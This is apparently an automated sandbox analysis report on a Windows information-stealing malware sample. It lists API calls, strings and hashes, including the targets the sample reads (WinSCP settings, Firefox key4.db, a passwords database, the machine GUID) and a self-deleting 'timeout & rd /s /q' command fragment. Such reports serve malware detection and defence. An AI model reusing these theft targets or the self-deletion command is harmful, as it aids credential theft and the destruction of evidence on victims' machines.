                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,",?,?,build_id,?,"), ref: 00415F20
                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00660CAC,?,000007CF,?,?,?,?,?,?,?,?,?,",?,?,build_id), ref: 00415F5E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: lstrlen$FileInternetRead
                                                                                                                                                                                                                                                        • String ID: "$------$build_id$hwid
                                                                                                                                                                                                                                                        • API String ID: 55632845-50533134
                                                                                                                                                                                                                                                        • Opcode ID: e0d7cceb4d819f9284b24f4595ddcfb05509cb9f4bd70c7d53174018c756231b
                                                                                                                                                                                                                                                        • Instruction ID: 402193ce10dc7b42423248ea00b3435e4141f7d6161ca5b4c01f9afd4d615bc0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0d7cceb4d819f9284b24f4595ddcfb05509cb9f4bd70c7d53174018c756231b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FFF10775301300AFC755DB5CEC95A69B7EBBF882867480068E826C7362DB70ED64DF18

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 657 41f015-41f0d1 memset * 4 RegOpenKeyExA
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0041F031
                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0041F04A
                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0041F05B
                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0041F06C
                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0041F0B4
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: memset$Open
                                                                                                                                                                                                                                                        • String ID: Software\Martin Prikryl\WinSCP 2\Configuration
                                                                                                                                                                                                                                                        • API String ID: 276825008-2822339690
                                                                                                                                                                                                                                                        • Opcode ID: 55ca331583c1b56da4eda0f163f524fd814237aa015647e50c31af739886e312
                                                                                                                                                                                                                                                        • Instruction ID: 67e5a23803197c295e594884a1bcfb30543c02150a40f664988b08af0becf682
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55ca331583c1b56da4eda0f163f524fd814237aa015647e50c31af739886e312
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E911B6B2D00224ABD710DBA6DC49DCB3BBCEB86314F04002EF518D7242EA749E04CBE6

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 659 4316b3-43194e ShellExecuteEx memset ExitProcess
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExecuteExitProcessShellmemset
                                                                                                                                                                                                                                                        • String ID: " & exit$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                                                                                                        • API String ID: 1852908831-902342072
                                                                                                                                                                                                                                                        • Opcode ID: d3c879c7fcc5211aaa1ff041d1c412e50f65e79b210380a5d73dc8cbdf34615c
                                                                                                                                                                                                                                                        • Instruction ID: 2a002250497271e3134e097aad980d56da38cb9a53392a3f471f187178a44462
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3c879c7fcc5211aaa1ff041d1c412e50f65e79b210380a5d73dc8cbdf34615c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA711836F112589FD710CF5CED84A6973EAAFCD605B040129E81AD7322D778ED1ACB49

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 683 41bc58-41be76 send
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • send.WS2_32(?,00000000,00000000,00000000), ref: 0041BE5A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: send
                                                                                                                                                                                                                                                        • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $GET
                                                                                                                                                                                                                                                        • API String ID: 2809346765-3104479224
                                                                                                                                                                                                                                                        • Opcode ID: cbc5bc4946d98ffa555f3a1d77012afb07b064be0202adbf9545ba350e3e99e9
                                                                                                                                                                                                                                                        • Instruction ID: 8ed605f06c46fc60804accb197c5789d50c680f39d24823af872ce5175c4c2c2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cbc5bc4946d98ffa555f3a1d77012afb07b064be0202adbf9545ba350e3e99e9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB5161722003009FC264CB6CEC91E9A77EAEFD9215F09452DE51AD3362DE74EE18C769

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 720 431780-43192c ShellExecuteEx memset ExitProcess 735 431930-43194e 720->735
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExecuteExitProcessShellmemset
                                                                                                                                                                                                                                                        • String ID: " & exit$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                                                                                                        • API String ID: 1852908831-902342072
                                                                                                                                                                                                                                                        • Opcode ID: 826b4db12de1f0db7223b33c4c6a9bae5ac6569255e01de44e8bad8e8de128e9
                                                                                                                                                                                                                                                        • Instruction ID: 1897a33db55b6b1516045603409b71ec64b1beeeec8d7986a5e96afe74b09f89
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 826b4db12de1f0db7223b33c4c6a9bae5ac6569255e01de44e8bad8e8de128e9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7412972F103589FD710CF1CED8496973EAAF8D605B044229F81AD7322D778EA5ACB49

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 742 426f71-4271b8 CopyFileA 767 4271ba call 4200d2 742->767 768 4271ba call 42019c 742->768 769 4271ba call 4201dd 742->769 766 4271bc-4271d7 767->766 768->766 769->766
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0042717E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                                                                                                        • String ID: \key4.db$d=E$d=E
                                                                                                                                                                                                                                                        • API String ID: 1304948518-1705763178
                                                                                                                                                                                                                                                        • Opcode ID: 3e3d83680770a654f3bf792a03ff31a7bfc5ec998db6146819a07833e286aeb1
                                                                                                                                                                                                                                                        • Instruction ID: 4821812f8bf7a8a1f99ca581dd5a92acd23b7366e59edd698fe43bc3c08f3827
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e3d83680770a654f3bf792a03ff31a7bfc5ec998db6146819a07833e286aeb1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A71E07AB003188FC708DF9DDC80E9977FAEF992147094665E81AD7372D624EE04CB68

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 770 43ad20-43aeb4 DeleteFileA CopyFileA call 42f3a6 787 43aeb6-43aee1 call 445ea0 770->787
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0043AE6A
                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 0043AE92
                                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AEBF
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$CopyDeleteUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                        • String ID: Xy'I
                                                                                                                                                                                                                                                        • API String ID: 3134562156-2702762207
                                                                                                                                                                                                                                                        • Opcode ID: e45210d9fde4f21fae835b6d678c2a5a97ef2876d71ea2cc5f4696ef12bc7a48
                                                                                                                                                                                                                                                        • Instruction ID: 8fc67030b0a7aa72092dac6407433eb7b1cfde439f72d62168c11223eba465b1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e45210d9fde4f21fae835b6d678c2a5a97ef2876d71ea2cc5f4696ef12bc7a48
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4510CB5A00214CFCB14CFACDDA5E9973F6AF9920670A4265B809D73A2C670FD45CF4A

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 791 41cdeb-41cf57 RtlAllocateHeap RtlFreeHeap DeleteFileA 809 41cf5b-41cf61 791->809 810 41cf66 809->810 810->810
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0041CE19
                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0041CF32
                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0041CF4E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Heap$AllocateDeleteFileFree
                                                                                                                                                                                                                                                        • String ID: _passwords.db
                                                                                                                                                                                                                                                        • API String ID: 2485951164-1485422284
                                                                                                                                                                                                                                                        • Opcode ID: d57cab47d7dac18adc9d6d2c496fd208eb3d593c7402750c20951bb7bf1397fe
                                                                                                                                                                                                                                                        • Instruction ID: f41fdeda9dfe8104a1f94bef4917f754430451c26a97d7c1a4403d231b0f3285
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d57cab47d7dac18adc9d6d2c496fd208eb3d593c7402750c20951bb7bf1397fe
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 284136B5A002069FDB04DF99EC81CBA77F9FF88602705146DE816E7326DB75ED018B98
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0042DDFF
                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119), ref: 0042DE44
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Openmemset
                                                                                                                                                                                                                                                        • String ID: SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                        • API String ID: 180050240-1514646153
                                                                                                                                                                                                                                                        • Opcode ID: 433b175eee3944dde828781b544b9bf3f7d44eb40bdad21b233979a260885154
                                                                                                                                                                                                                                                        • Instruction ID: 46ac7e183783d86e26adb07f5837e5492789bf38a844fde72eafafbba06e7dc8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 433b175eee3944dde828781b544b9bf3f7d44eb40bdad21b233979a260885154
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10F0C2B5601214ABD224DF25DD86D2B7B6CDB86300B05832CF80887742EA34DD24C6A6
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0042E378
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
